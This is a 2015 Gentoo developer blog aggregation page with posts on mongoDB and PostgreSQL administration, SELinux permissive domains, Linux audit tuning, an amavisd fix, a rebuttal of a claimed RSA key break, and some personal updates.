Gentoo Logo
Gentoo Logo Side
Gentoo Spaceship

Contributors:
. Aaron W. Swenson
. Agostino Sarubbo
. Alec Warner
. Alex Alexander
. Alex Legler
. Alexey Shvetsov
. Alexis Ballier
. Alexys Jacob
. Amadeusz Żołnowski
. Andreas K. Hüttel
. Andreas Proschofsky
. Anthony Basile
. Arun Raghavan
. Bernard Cafarelli
. Bjarke Istrup Pedersen
. Brent Baude
. Brian Harring
. Christian Ruppert
. Chí-Thanh Christopher Nguyễn
. Daniel Gryniewicz
. David Abbott
. Denis Dupeyron
. Detlev Casanova
. Diego E. Pettenò
. Domen Kožar
. Donnie Berkholz
. Doug Goldstein
. Eray Aslan
. Fabio Erculiani
. Gentoo Haskell Herd
. Gentoo Monthly Newsletter
. Gentoo News
. Gilles Dartiguelongue
. Greg KH
. Hanno Böck
. Hans de Graaff
. Ian Whyman
. Ioannis Aslanidis
. Jan Kundrát
. Jason Donenfeld
. Jeffrey Gardner
. Jeremy Olexa
. Joachim Bartosik
. Johannes Huber
. Jonathan Callen
. Jorge Manuel B. S. Vicetto
. Joseph Jezak
. Kenneth Prugh
. Kristian Fiskerstrand
. Lance Albertson
. Liam McLoughlin
. LinuxCrazy Podcasts
. Luca Barbato
. Luis Francisco Araujo
. Mark Loeser
. Markos Chandras
. Mart Raudsepp
. Matt Turner
. Matthew Marlowe
. Matthew Thode
. Matti Bickel
. Michael Palimaka
. Michal Hrusecky
. Michał Górny
. Mike Doty
. Mike Gilbert
. Mike Pagano
. Nathan Zachary
. Ned Ludd
. Nirbheek Chauhan
. Pacho Ramos
. Patrick Kursawe
. Patrick Lauer
. Patrick McLean
. Pavlos Ratis
. Paweł Hajdan, Jr.
. Petteri Räty
. Piotr Jaroszyński
. Rafael Goncalves Martins
. Raúl Porcel
. Remi Cardona
. Richard Freeman
. Robin Johnson
. Ryan Hill
. Sean Amoss
. Sebastian Pipping
. Steev Klimaszewski
. Stratos Psomadakis
. Sune Kloppenborg Jeppesen
. Sven Vermeulen
. Sven Wegener
. Thomas Kahle
. Tiziano Müller
. Tobias Heinlein
. Tobias Klausmann
. Tom Wijsman
. Tomáš Chvátal
. Vikraman Choudhury
. Vlastimil Babka
. Zack Medico

Last updated:
May 27, 2015, 19:06 UTC

Disclaimer:
Views expressed in the content published here do not necessarily represent the views of Gentoo Linux or the Gentoo Foundation.


Bugs? Comments? Suggestions? Contact us!

Powered by:
Planet Venus

Welcome to Gentoo Universe, an aggregation of weblog articles on all topics written by Gentoo developers. For a more refined aggregation of Gentoo-related topics only, you might be interested in Planet Gentoo.

May 26, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)

In my previous post regarding the migration of our production cluster to mongoDB 3.0 WiredTiger, we successfully upgraded all the secondaries of our replica-sets with decent performances and (almost, read on) no breakage.

Step 2 plan

The next step of our migration was to test our work load on WiredTiger primaries. After all, this is where the new engine would finally demonstrate all its capabilities.

  • We thus scheduled a step down from our 3.0 MMAPv1 primary servers so that our WiredTiger secondaries would take over.
  • Not migrating the primaries was a safety net in case something went wrong… And boy it went so wrong we’re glad we played it safe that way !
  • We rolled back after 10 minutes of utter bitterness.

The failure

After all the wait and expectation, I can’t express our level of disappointment at work when we saw that the WiredTiger engine could not handle our work load. Our application started immediately to throw 50 to 250 WriteConflict errors per minute !

Turns out that we are affected by this bug and that, of course, we’re not the only ones. So far it seems that it affects collections with :

  • heavy insert / update work loads
  • an unique index (or compound index)

The breakages

We also discovered that we’re affected by a weird mongodump new behaviour where the dumped BSON file does not contain the number of documents that mongodump said it was exporting. This is clearly a new problem because it happened right after all our secondaries switched to WiredTiger.

Since we have to ensure a strong consistency of our exports and that the mongoDB guys don’t seem so keen on moving on the bug (which I surely can understand) there is a large possibility that we’ll have to roll back even the WiredTiger secondaries altogether.

Not to mention that since the 3.0 version, we experience some CPU overloads crashing the entire server on our MMAPv1 primaries that we’re still trying to tackle before opening another JIRA bug…

Sad panda

Of course, any new major release such as 3.0 causes its headaches and brings its lot of bugs. We were ready for this hence the safety steps we took to ensure that we could roll back on any problem.

But as a long time advocate of mongoDB I must admit my frustration, even more after the time it took to get this 3.0 out and all the expectations that came with it.

I hope I can share some better news on the next blog post.

May 25, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)

I have been running a PostgreSQL cluster for a while as the primary backend for many services. The database system is very robust, well supported by the community and very powerful. In this post, I’m going to show how I use central authentication and authorization with PostgreSQL.

Centralized management is an important principle whenever deployments become very dispersed. For authentication and authorization, having a high-available LDAP is one of the more powerful components in any architecture. It isn’t the only method though – it is also possible to use a distributed approach where the master data is centrally managed, but the proper data is distributed to the various systems that need it. Such a distributed approach allows for high availability without the need for a highly available central infrastructure (user ids, group membership and passwords are distributed to the servers rather than queried centrally). Here, I’m going to focus on a mixture of both methods: central authentication for password verification, and distributed authorization.

PostgreSQL default uses in-database credentials

By default, PostgreSQL uses in-database credentials for the authentication and authorization. When a CREATE ROLE (or CREATE USER) command is issued with a password, it is stored in the pg_catalog.pg_authid table:

postgres# select rolname, rolpassword from pg_catalog.pg_authid;
    rolname     |             rolpassword             
----------------+-------------------------------------
 postgres_admin | 
 dmvsl          | 
 johan          | 
 hdc_owner      | 
 hdc_reader     | 
 hdc_readwrite  | 
 hadoop         | 
 swift          | 
 sean           | 
 hdpreport      | 
 postgres       | md5c127bc9fc185daf0e06e785876e38484

Authorizations are also stored in the database (and unless I’m mistaken, this cannot be moved outside):

postgres# \l db_hadoop
                                   List of databases
   Name    |   Owner   | Encoding |  Collate   |   Ctype    |     Access privileges     
-----------+-----------+----------+------------+------------+---------------------------
 db_hadoop | hdc_owner | UTF8     | en_US.utf8 | en_US.utf8 | hdc_owner=CTc/hdc_owner  +
           |           |          |            |            | hdc_reader=c/hdc_owner   +
           |           |          |            |            | hdc_readwrite=c/hdc_owner

Furthermore, PostgreSQL has some additional access controls through its pg_hba.conf file, in which the access towards the PostgreSQL service itself can be governed based on context information (such as originating IP address, target database, etc.).

For more information about the standard setups for PostgreSQL, definitely go through the official PostgreSQL documentation as it is well documented and kept up-to-date.

Now, for central management, in-database settings become more difficult to handle.

Using PAM for authentication

The first step to move the management of authentication and authorization outside the database is to look at a way to authenticate users (password verification) outside the database. I tend not to use a distributed password approach (where a central component is responsible for changing passwords on multiple targets), instead relying on a high-available LDAP setup, but with local caching (to catch short-lived network hick-ups) and local password use for last-hope accounts (such as root and admin accounts).

PostgreSQL can be configured to directly interact with an LDAP, but I like to use Linux PAM whenever I can. For my systems, it is a standard way of managing the authentication of many services, so the same goes for PostgreSQL. And with the sys-auth/pam_ldap package integrating multiple services with LDAP is a breeze. So the first step is to have PostgreSQL use PAM for authentication. This is handled through its pg_hba.conf file:

# TYPE  DATABASE        USER    ADDRESS         METHOD          [OPTIONS]
local   all             all                     md5
host    all             all     all             pam             pamservice=postgresql

This will have PostgreSQL use the postgresql PAM service for authentication. The PAM configuration is thus in /etc/pam.d/postgresql. In it, we can either directly use the LDAP PAM modules, or use the SSSD modules and have SSSD work with LDAP.

Yet, this isn’t sufficient. We still need to tell PostgreSQL which users can be authenticated – the users need to be defined in the database (just without password credentials because that is handled externally now). This is done together with the authorization handling.

Users and group membership

Every service on the systems I maintain has dedicated groups in which for instance its administrators are listed. For instance, for the PostgreSQL services:

# getent group gpgsqladmin
gpgsqladmin:x:413843:swift,dmvsl

A local batch job (ran through cron) queries this group (which I call the masterlist, as well as queries which users in PostgreSQL are assigned the postgres_admin role (which is a superuser role like postgres and is used as the intermediate role to assign to administrators of a PostgreSQL service), known as the slavelist. Delta’s are then used to add the user or remove it.

# Note: membersToAdd / membersToRemove / _psql are custom functions
#       so do not vainly search for them on your system ;-)
for member in $(membersToAdd ${masterlist} ${slavelist}) ; do
  _psql "CREATE USER ${member} LOGIN INHERIT;" postgres
  _psql "GRANT postgres_admin TO ${member};" postgres
done

for member in $(membersToRemove ${masterlist} ${slavelist}) ; do
  _psql "REVOKE postgres_admin FROM ${member};" postgres
  _psql "DROP USER ${member};" postgres
done

The postgres_admin role is created whenever I create a PostgreSQL instance. Likewise, for databases, a number of roles are added as well. For instance, for the db_hadoop database, the hdc_owner, hdc_reader and hdc_readwrite roles are created with the right set of privileges. Users are then granted this role if they belong to the right group in the LDAP. For instance:

# getent group gpgsqlhdc_own
gpgsqlhdc_own:x:413850:hadoop,johan,christov,sean

With this simple approach, granting users access to a database is a matter of adding the user to the right group (like gpgsqlhdc_ro for read-only access to the Hadoop related database(s)) and either wait for the cron-job to add it, or manually run the authorization synchronization. By standardizing on infrastructural roles (admin, auditor) and data roles (owner, rw, ro) managing multiple databases is a breeze.

May 23, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

Hallo!

Die Troisdorfer Linux User Group (kurz TroLUG) veranstaltet

am Samstag den 01.08.2015
in Troisdorf nahe Köln/Bonn

einen Gentoo-Workshop, der sich an fortgeschrittene User richtet.

Mehr Details, die genaue Adresse und der Ablauf finden sich auf der entsprechenden Seite der TroLUG.

Grüße,

 

Sebastian

Alexys Jacob a.k.a. ultrabug (homepage, bugs)

Good news for gevent users blocked on python < 2.7.9 due to broken SSL support since python upstream dropped the private API _ssl.sslwrap that eventlet was using.

This issue was starting to get old and problematic since GLSA 2015-0310 but I’m happy to say that almost 6 hours after the gevent-1.0.2 release, it is already available on portage !

We were also affected by this issue at work so I’m glad that the tension between ops and devs this issue was causing will finally be over ;)

May 22, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Three new quotes to the database (May 22, 2015, 18:19 UTC)

Today I added three new quotes to the “My Favourite Quotes” database that you see on the right-hand side of my blog.

“The evil people of the world would have little impact without the sheep.”
–Tim Clark

“Apologising does not always mean that you’re wrong and the other person is right. It just means that you value your relationship more than your ego.”
–Unknown

“Some day soon, perhaps in forty years, there will be no one alive who has ever known me. That’s when I will be truly dead – when I exist in no one’s memory. I thought a lot about how someone very old is the last living individual to have known some person or cluster of people. When that person dies, the whole cluster dies,too, vanishes from the living memory. I wonder who that person will be for me. Whose death will make me truly dead?”
–Irvin D. Yalom in Love’s Executioner and Other Tales of Psychotherapy

The first one came up during a conversation that I was having with a colleague who is absolutely brilliant. That quote in particular sums up a very simplistic idea, but one that would have a dramatic impact on human existence if we were to recognise our sometimes blind following of others.

Cheers,
Zach

May 20, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Late last night, I decided to apply some needed updates to my personal mail server, which is running Gentoo Linux (OpenRC) with a mail stack of Postfix & Dovecot with AMaViS (filtering based on SpamAssassin, ClamAV, and Vipul’s Razor). After applying the updates, and restarting the necessary components of the mail stack, I ran my usual test of sending an email from one of my accounts to another one. It went through without a problem.

However, I realised that it isn’t a completely valid test to send an email from one internal account to another because I have amavisd configured to not scan anything coming from my trusted IPs and domains. I noticed several hundred mails in the queue when I ran postqueue -p, and they all had notices similar to:

status=deferred (delivery temporarily suspended:
connect to 127.0.0.1[127.0.0.1]:10024: Connection refused)

That indicated to me that it wasn’t a problem with Postfix (and I knew it wasn’t a problem with Dovecot, because I could connect to my accounts via IMAP). Seeing as amavisd is running on localhost:10024, I figured that that is where the problem had to be. A lot of times, when there is a “connection refused” notification, it is because no service is listening on that port. You can test to see what ports are in a listening state and what processes, applications, or daemons are listening by running:

netstat -tupan | grep LISTEN

When I did that, I noticed that amavisd wasn’t listening on port 10024, which made me think that it wasn’t running at all. That’s when I ran into the strange part of the problem: the init script output:

# /etc/init.d/amavisd start
* WARNING: amavisd has already been started
# /etc/init.d/amavisd stop
The amavisd daemon is not running                [ !! ]
* ERROR: amavisd failed to start

So, apparently it is running and not running at the same time (sounds like a Linux version of Schrödinger’s cat to me)! It was obvious, though, that it wasn’t actually running (which could be verified with ‘ps -elf | grep -i amavis’). So, what to do? I tried manually removing the PID file, but that actually just made matters a bit worse. Ultimately, this combination is what fixed the problem for me:

sa-update
/etc/init.d/amavisd zap
/etc/init.d/amavisd start

It seems that the SpamAssassin rules file had gone missing, and that was causing amavisd to not start properly. Manually updating the rules file (with ‘sa-update’) regenerated it, and then I zapped amavisd completely, and lastly restarted the daemon.

Hope that helps anyone running into the same problem.

Cheers,
Zach

Arun Raghavan a.k.a. ford_prefect (homepage, bugs)
GNOME Asia 2015 (May 20, 2015, 08:08 UTC)

I was in Depok, Indonesia last week to speak at GNOME Asia 2015. It was a great experience — the organisers did a fantastic job and as a bonus, the venue was incredibly pretty!

View from our room

View from our room

My talk was about the GNOME audio stack, and my original intention was to talk a bit about the APIs, how to use them, and how to choose which to use. After the first day, though, I felt like a more high-level view of the pieces would be more useful to the audience, so I adjusted the focus a bit. My slides are up here.

Nirbheek and I then spent a couple of days going down to Yogyakarta to cycle around, visit some temples, and sip some fine hipster coffee.

All in all, it was a week well spent. I’d like to thank the GNOME Foundation for helping me get to the conference!

Sponsored by GNOME!

Sponsored by GNOME!

May 19, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Well, it was that time of the year again this past weekend–time for the 2015 St. Louis Children’s Hospital Make Tracks for the Zoo race! This race is always one of my favourite ones of the year, so I was excited to partake in it. There’s always a great turnout (~3500 this year, I believe, but 1644 chipped for the 5K run), and lots of fun, family-oriented activities. One of the best parts is that there are people of all ages, and walks of life (pun intended) who show up to either walk or run to support the amazing Saint Louis Zoo!


2015 St. Louis Make Tracks for the Zoo pre-race line-up
2015 St. Louis Make Tracks for the Zoo – Pre-race
(click to enlarge)

It started out a little iffy this year because there was some substantial rain. Ultimately, though, the rain cleared and the sun started shining in time for the race. The only downside was that the course was pretty slick due to the rain. Despite the slippery course, I did better than expected in terms of time. My total 5K time was 19’06”, according to the chip-timing provided by Big River Running Company (which is a great local running store here in the Saint Louis area). You can see the full results, and sort by whatever criteria you would like by visiting their ChronoTrack site for this race.


2015 St. Louis Make Tracks for the Zoo results
2015 St. Louis Make Tracks for the Zoo results
(click to enlarge)

There were some great runners this year! My time earned me 13th overall, 11th in overall male, and 3rd in my bracket (which is now Male 30-34 [ugh, can't believe I turned 30 this month]). Some really outstanding participants (besides the obvious of the overall winners) this year were Zachary Niemeyer, who at 14 finished 15th overall with a great time of 19’10”, and Norman Jamieson, who at age 79 finished in just over 33 minutes! I’ll be lucky to be able to walk at that age! :-)


2015 St. Louis Make Tracks for the Zoo - Nathan Zachary
Me, tired and sweaty from the humidity, but happy with the experience
(click to enlarge)

So, it was another great year for Make Tracks (especially since it was the 30th year for it), and I’m already looking forward to next year’s race. Hopefully you’ll come and join in a fun time that supports a great establishment!

Cheers,
Zach

P.S. A special thanks to my Pops for not only coming out to support me, but also for snapping the photos above!

May 18, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Testing with permissive domains (May 18, 2015, 11:40 UTC)

When testing out new technologies or new setups, not having (proper) SELinux policies can be a nuisance. Not only are the number of SELinux policies that are available through the standard repositories limited, some of these policies are not even written with the same level of confinement that an administrator might expect. Or perhaps the technology to be tested is used in a completely different manner.

Without proper policies, any attempt to start such a daemon or application might or will cause permission violations. In many cases, developers or users tend to disable SELinux enforcing then so that they can continue playing with the new technology. And why not? After all, policy development is to be done after the technology is understood.

But completely putting the system in permissive mode is overshooting. It is much easier to make a very simple policy to start with, and then mark the domain as a permissive domain. What happens is that the software then, after transitioning into the “simple” domain, is not part of the SELinux enforcements anymore whereas the rest of the system remains in SELinux enforcing mode.

For instance, create a minuscule policy like so:

policy_module(testdom, 1.0)

type testdom_t;
type testdom_exec_t;
init_daemon_domain(testdom_t, testdom_exec_t)

Mark the executable for the daemon as testdom_exec_t (after building and loading the minuscule policy):

~# chcon -t testdom_exec_t /opt/something/bin/daemond

Finally, tell SELinux that testdom_t is to be seen as a permissive domain:

~# semanage permissive -a testdom_t

When finished, don’t forget to remove the permissive bit (semanage permissive -d testdom_t) and unload/remove the SELinux policy module.

And that’s it. If the daemon is now started (through a standard init script) it will run as testdom_t and everything it does will be logged, but not enforced by SELinux. That might even help in understanding the application better.

May 17, 2015
Hanno Böck a.k.a. hanno (homepage, bugs)

Keystl;dr News about a broken 4096 bit RSA key are not true. It is just a faulty copy of a valid key.

Earlier today a blog post claiming the factoring of a 4096 bit RSA key was published and quickly made it to the top of Hacker News. The key in question was the PGP key of a well-known Linux kernel developer. I already commented on Hacker News why this is most likely wrong, but I thought I'd write up some more details. To understand what is going on I have to explain some background both on RSA and on PGP keyservers. This by itself is pretty interesting.

RSA public keys consist of two values called N and e. The N value, called the modulus, is the interesting one here. It is the product of two very large prime numbers. The security of RSA relies on the fact that these two numbers are secret. If an attacker would be able to gain knowledge of these numbers he could use them to calculate the private key. That's the reason why RSA depends on the hardness of the factoring problem. If someone can factor N he can break RSA. For all we know today factoring is hard enough to make RSA secure (at least as long as there are no large quantum computers).

Now imagine you have two RSA keys, but they have been generated with bad random numbers. They are different, but one of their primes is the same. That means we have N1=p*q1 and N2=p*q2. In this case RSA is no longer secure, because calculating the greatest common divisor (GCD) of two large numbers can be done very fast with the euclidean algorithm, therefore one can calculate the shared prime value.

It is not only possible to break RSA keys if you have two keys with one shared factors, it is also possible to take a large set of keys and find shared factors between them. In 2012 Arjen Lenstra and his team published a paper using this attack on large scale key sets and at the same time Nadia Heninger and a team at the University of Michigan independently also performed this attack. This uncovered a lot of vulnerable keys on embedded devices, but these were mostly SSH and TLS keys. Lenstra's team however also found two vulnerable PGP keys. For more background you can watch this 29C3 talk by Nadia Heninger, Dan Bernstein and Tanja Lange.

PGP keyservers have been around since quite some time and they have a property that makes them especially interesting for this kind of research: They usually never delete anything. You can add a key to a keyserver, but you cannot remove it, you can only mark it as invalid by revoking it. Therefore using the data from the keyservers gives you a large set of cryptographic keys.

Okay, so back to the news about the supposedly broken 4096 bit key: There is a service called Phuctor where you can upload a key and it'll check it against a set of known vulnerable moduli. This service identified the supposedly vulnerable key.

The key in question has the key id e99ef4b451221121 and belongs to the master key bda06085493bace4. Here is the vulnerable modulus:

c844a98e3372d67f 562bd881da8ea66c a71df16deab1541c e7d68f2243a37665 c3f07d3dd6e651cc d17a822db5794c54 ef31305699a6c77c 043ac87cafc022a3 0a2a717a4aa6b026 b0c1c818cfc16adb aae33c47b0803152 f7e424b784df2861 6d828561a41bdd66 bd220cb46cd288ce 65ccaf9682b20c62 5a84ef28c63e38e9 630daa872270fa15 80cb170bfc492b80 6c017661dab0e0c9 0a12f68a98a98271 82913ff626efddfb f8ae8f1d40da8d13 a90138686884bad1 9db776bb4812f7e3 b288b47114e486fa 2de43011e1d5d7ca 8daf474cb210ce96 2aafee552f192ca0 32ba2b51cfe18322 6eb21ced3b4b3c09 362b61f152d7c7e6 51e12651e915fc9f 67f39338d6d21f55 fb4e79f0b2be4d49 00d442d567bacf7b 6defcd5818b050a4 0db6eab9ad76a7f3 49196dcc5d15cc33 69e1181e03d3b24d a9cf120aa7403f40 0e7e4eca532eac24 49ea7fecc41979d0 35a8e4accea38e1b 9a33d733bea2f430 362bd36f68440ccc 4dc3a7f07b7a7c8f cdd02231f69ce357 4568f303d6eb2916 874d09f2d69e15e6 33c80b8ff4e9baa5 6ed3ace0f65afb43 60c372a6fd0d5629 fdb6e3d832ad3d33 d610b243ea22fe66 f21941071a83b252 201705ebc8e8f2a5 cc01112ac8e43428 50a637bb03e511b2 06599b9d4e8e1ebc eb1e820d569e31c5 0d9fccb16c41315f 652615a02603c69f e9ba03e78c64fecc 034aa783adea213b

In fact this modulus is easily factorable, because it can be divided by 3. However if you look at the master key bda06085493bace4 you'll find another subkey with this modulus:

c844a98e3372d67f 562bd881da8ea66c a71df16deab1541c e7d68f2243a37665 c3f07d3dd6e651cc d17a822db5794c54 ef31305699a6c77c 043ac87cafc022a3 0a2a717a4aa6b026 b0c1c818cfc16adb aae33c47b0803152 f7e424b784df2861 6d828561a41bdd66 bd220cb46cd288ce 65ccaf9682b20c62 5a84ef28c63e38e9 630daa872270fa15 80cb170bfc492b80 6c017661dab0e0c9 0a12f68a98a98271 82c37b8cca2eb4ac 1e889d1027bc1ed6 664f3877cd7052c6 db5567a3365cf7e2 c688b47114e486fa 2de43011e1d5d7ca 8daf474cb210ce96 2aafee552f192ca0 32ba2b51cfe18322 6eb21ced3b4b3c09 362b61f152d7c7e6 51e12651e915fc9f 67f39338d6d21f55 fb4e79f0b2be4d49 00d442d567bacf7b 6defcd5818b050a4 0db6eab9ad76a7f3 49196dcc5d15cc33 69e1181e03d3b24d a9cf120aa7403f40 0e7e4eca532eac24 49ea7fecc41979d0 35a8e4accea38e1b 9a33d733bea2f430 362bd36f68440ccc 4dc3a7f07b7a7c8f cdd02231f69ce357 4568f303d6eb2916 874d09f2d69e15e6 33c80b8ff4e9baa5 6ed3ace0f65afb43 60c372a6fd0d5629 fdb6e3d832ad3d33 d610b243ea22fe66 f21941071a83b252 201705ebc8e8f2a5 cc01112ac8e43428 50a637bb03e511b2 06599b9d4e8e1ebc eb1e820d569e31c5 0d9fccb16c41315f 652615a02603c69f e9ba03e78c64fecc 034aa783adea213b

You may notice that these look pretty similar. But they are not the same. The second one is the real subkey, the first one is just a copy of it with errors.

If you run a batch GCD analysis on the full PGP key server data you will find a number of such keys (Nadia Heninger has published code to do a batch GCD attack). I don't know how they appear on the key servers, I assume they are produced by network errors, harddisk failures or software bugs. It may also be that someone just created them in some experiment.

The important thing is: Everyone can generate a subkey to any PGP key and upload it to a key server. That's just the way the key servers work. They don't check keys in any way. However these keys should pose no threat to anyone. The only case where this could matter would be a broken implementation of the OpenPGP key protocol that does not check if subkeys really belong to a master key.

However you won't be able to easily import such a key into your local GnuPG installation. If you try to fetch this faulty sub key from a key server GnuPG will just refuse to import it. The reason is that every sub key has a signature that proves that it belongs to a certain master key. For those faulty keys this signature is obviously wrong.

Now here's my personal tie in to this story: Last year I started a project to analyze the data on the PGP key servers. And at some point I thought I had found a large number of vulnerable PGP keys – including the key in question here. In a rush I wrote a mail to all people affected. Only later I found out that something was not right and I wrote to all affected people again apologizing. Most of the keys I thought I had found were just faulty keys on the key servers.

The code I used to parse the PGP key server data is public, I also wrote a background paper and did a talk at the BsidesHN conference.

May 14, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)

Well, sometimes there is a mistake so blatantly obvious on a website that it just has to be shared with others. I was looking at the Material Safety Data Sheets from Exxon Mobil (don’t ask; I was just interested in seeing the white paper on Mobil jet oil), and I noticed something rather strange in the drop-down menu:



Click for a larger version

Yup, apparently now Africa is a country. Funny, all this time I thought it was a continent. Interestingly enough, you can see that they did list Angola and Botswana as countries. Countries within countries—either very meta, or along the lines of country-ception (oh the double entendre), but I digress…

Cheers,
Zach

May 13, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
uWSGI, gevent and pymongo 3 threads mayhem (May 13, 2015, 14:56 UTC)

This is a quick heads-up post about a behaviour change when running a gevent based application using the new pymongo 3 driver under uWSGI and its gevent loop.

I was naturally curious about testing this brand new and major update of the python driver for mongoDB so I just played it dumb : update and give a try on our existing code base.

The first thing I noticed instantly is that a vast majority of our applications were suddenly unable to reload gracefully and were force killed by uWSGI after some time !

worker 1 (pid: 9839) is taking too much time to die...NO MERCY !!!

uWSGI’s gevent-wait-for-hub

All our applications must be able to be gracefully reloaded at any time. Some of them are spawning quite a few greenlets on their own so as an added measure of making sure we never loose any running greenlet we use the gevent-wait-for-hub option, which is described as follow :

wait for gevent hub's death instead of the control greenlet

… which does not mean a lot but is explained in a previous uWSGI changelog :

During shutdown only the greenlets spawned by uWSGI are taken in account,
and after all of them are destroyed the process will exit.

This is different from the old approach where the process wait for
ALL the currently available greenlets (and monkeypatched threads).

If you prefer the old behaviour just specify the option gevent-wait-for-hub

pymongo 3

Compared to its previous 2.x versions, one of the overall key aspect of the new pymongo 3 driver is its intensive usage of threads to handle server discovery and connection pools.

Now we can relate this very fact to the gevent-wait-for-hub behaviour explained above :

the process wait for ALL the currently available greenlets
(and monkeypatched threads)

This explained why our applications were hanging until the reload-mercy (force kill) timeout option of uWSGI hit the fan !

conclusion

When using pymongo 3 with the gevent-wait-for-hub option, you have to keep in mind that all of pymongo’s threads (so monkey patched threads) are considered as active greenlets and will thus be waited for termination before uWSGI recycles the worker !

Two options come in mind to handle this properly :

  1. stop using the gevent-wait-for-hub option and change your code to use a gevent pool group to make sure that all of your important greenlets are taken care of when a graceful reload happens (this is how we do it today, the gevent-wait-for-hub option usage was just over protective for us).
  2. modify your code to properly close all your pymongo connections on graceful reloads.

Hope this will save some people the trouble of debugging this ;)

May 10, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Audit buffering and rate limiting (May 10, 2015, 12:18 UTC)

Be it because of SELinux experiments, or through general audit experiments, sometimes you’ll get in touch with a message similar to the following:

audit: audit_backlog=321 > audit_backlog_limit=320
audit: audit_lost=44395 audit_rate_limit=0 audit_backlog_limit=320
audit: backlog limit exceeded

The message shows up when certain audit events could not be logged through the audit subsystem. Depending on the system configuration, they might be either ignored, sent through the kernel logging infrastructure or even have the system panic. And if the messages are sent to the kernel log then they might show up, but even that log has its limitations, which can lead to output similar to the following:

__ratelimit: 53 callbacks suppressed

In this post, I want to give some pointers in configuring the audit subsystem as well as understand these messages…

There is auditd and kauditd

If you take a look at the audit processes running on the system, you’ll notice that (assuming Linux auditing is used of course) two processes are running:

# ps -ef | grep audit
root      1483     1  0 10:11 ?        00:00:00 /sbin/auditd
root      1486     2  0 10:11 ?        00:00:00 [kauditd]

The /sbin/auditd daemon is the user-space audit daemon. It registers itself with the Linux kernel audit subsystem (through the audit netlink system), which responds with spawning the kauditd kernel thread/process. The fact that the process is a kernel-level one is why the kauditd is surrounded by brackets in the ps output.

Once this is done, audit messages are communicated through the netlink socket to the user-space audit daemon. For the detail-oriented people amongst you, look for the kauditd_send_skb() method in the kernel/audit.c file. Now, generated audit event messages are not directly relayed to the audit daemon – they are first queued in a sort-of backlog, which is where the backlog-related messages above come from.

Audit backlog queue

In the kernel-level audit subsystem, a socket buffer queue is used to hold audit events. Whenever a new audit event is received, it is logged and prepared to be added to this queue. Adding to this queue can be controlled through a few parameters.

The first parameter is the backlog limit. Be it through a kernel boot parameter (audit_backlog_limit=N) or through a message relayed by the user-space audit daemon (auditctl -b N), this limit will ensure that a queue cannot grow beyond a certain size (expressed in the amount of messages). If an audit event is logged which would grow the queue beyond this limit, then a failure occurs and is handled according to the system configuration (more on that later).

The second parameter is the rate limit. When more audit events are logged within a second than set through this parameter (which can be controlled through a message relayed by the user-space audit system, using auditctl -r N) then those audit events are not added to the queue. Instead, a failure occurs and is handled according to the system configuration.

Only when the limits are not reached is the message added to the queue, allowing the user-space audit daemon to consume those events and log those according to the audit configuration. There are some good resources on audit configuration available on the Internet. I find this SuSe chapter worth reading, but many others exist as well.

There is a useful command related to the subject of the audit backlog queue. It queries the audit subsystem for its current status:

# auditctl -s
AUDIT_STATUS: enabled=1 flag=1 pid=1483 rate_limit=0 backlog_limit=8192 lost=3 backlog=0

The command displays not only the audit state (enabled or not) but also the settings for rate limits (on the audit backlog) and backlog limit. It also shows how many events are currently still waiting in the backlog queue (which is zero in our case, so the audit user-space daemon has properly consumed and logged the audit events).

Failure handling

If an audit event cannot be logged, then this failure needs to be resolved. The Linux audit subsystem can be configured do either silently discard the message, switch to the kernel log subsystem, or panic. This can be configured through the audit user-space (auditctl -f [0..2]), but is usually left at the default (which is 1, being to switch to the kernel log subsystem).

Before that is done, the message is displayed which reveals the cause of the failure handling:

audit: audit_backlog=321 > audit_backlog_limit=320
audit: audit_lost=44395 audit_rate_limit=0 audit_backlog_limit=320
audit: backlog limit exceeded

In this case, the backlog queue was set to contain at most 320 entries (which is low for a production system) and more messages were being added (the Linux kernel in certain cases allows to have a few more entries than configured for performance and consistency reasons). The number of events already lost is displayed, as well as the current limitation settings. The message “backlog limit exceeded” can be “rate limit exceeded” if that was the limitation that was triggered.

Now, if the system is not configured to silently discard it, or to panic the system, then the “dropped” messages are sent to the kernel log subsystem. The calls however are also governed through a configurable limitation: it uses a rate limit which can be set through sysctl:

# sysctl -a | grep kernel.printk_rate
kernel.printk_ratelimit = 5
kernel.printk_ratelimit_burst = 10

In the above example, this system allows one message every 5 seconds, but does allow a burst of up to 10 messages at once. When the rate limitation kicks in, then the kernel will log (at most one per second) the number of suppressed events:

[40676.545099] __ratelimit: 246 callbacks suppressed

Although this limit is kernel-wide, not all kernel log events are governed through it. It is the caller subsystem (in our case, the audit subsystem) which is responsible for having its events governed through this rate limitation or not.

Finishing up

Before waving goodbye, I would like to point out that the backlog queue is a memory queue (and not on disk, Red Hat), just in case it wasn’t obvious. Increasing the queue size can result in more kernel memory consumption. Apparently, a practical size estimate is around 9000 bytes per message. On production systems, it is advised not to make this setting too low. I personally set it to 8192.

Lost audit events might result in difficulties for troubleshooting, which is the case when dealing with new or experimental SELinux policies. It would also result in missing security-important events. It is the audit subsystem, after all. So tune it properly, and enjoy the power of Linux’ audit subsystem.

May 09, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Reviving Gentoo VMware support (May 09, 2015, 23:41 UTC)

Sadly over the last months the support for VMware Workstation and friends in Gentoo dropped a lot. Why? Well, I was the only developer left who cared, and it's definitely not at the top of my Gentoo priorities list. To be honest that has not really changed. However... let's try to harness the power of the community now.

I've pushed a mirror of the Gentoo vmware overlay to Github, see


If you have improvements, version bumps, ... - feel free to generate pull requests. Everything related to VMware products is acceptable. I hope some more people will over time sign up and help merging. Just be careful when using the overlay, it likely won't get the same level of review as ebuilds in the main tree.

May 07, 2015
Alexys Jacob a.k.a. ultrabug (homepage, bugs)

We’ve been running a nice mongoDB cluster in production for several years now in my company.

This cluster suits quite a wide range of use cases from very simple configuration collections to complex queried ones and real time analytics. This versatility has been the strong point of mongoDB for us since the start as it allows different teams to address their different problems using the same technology. We also run some dedicated replica sets for other purposes and network segmentation reasons.

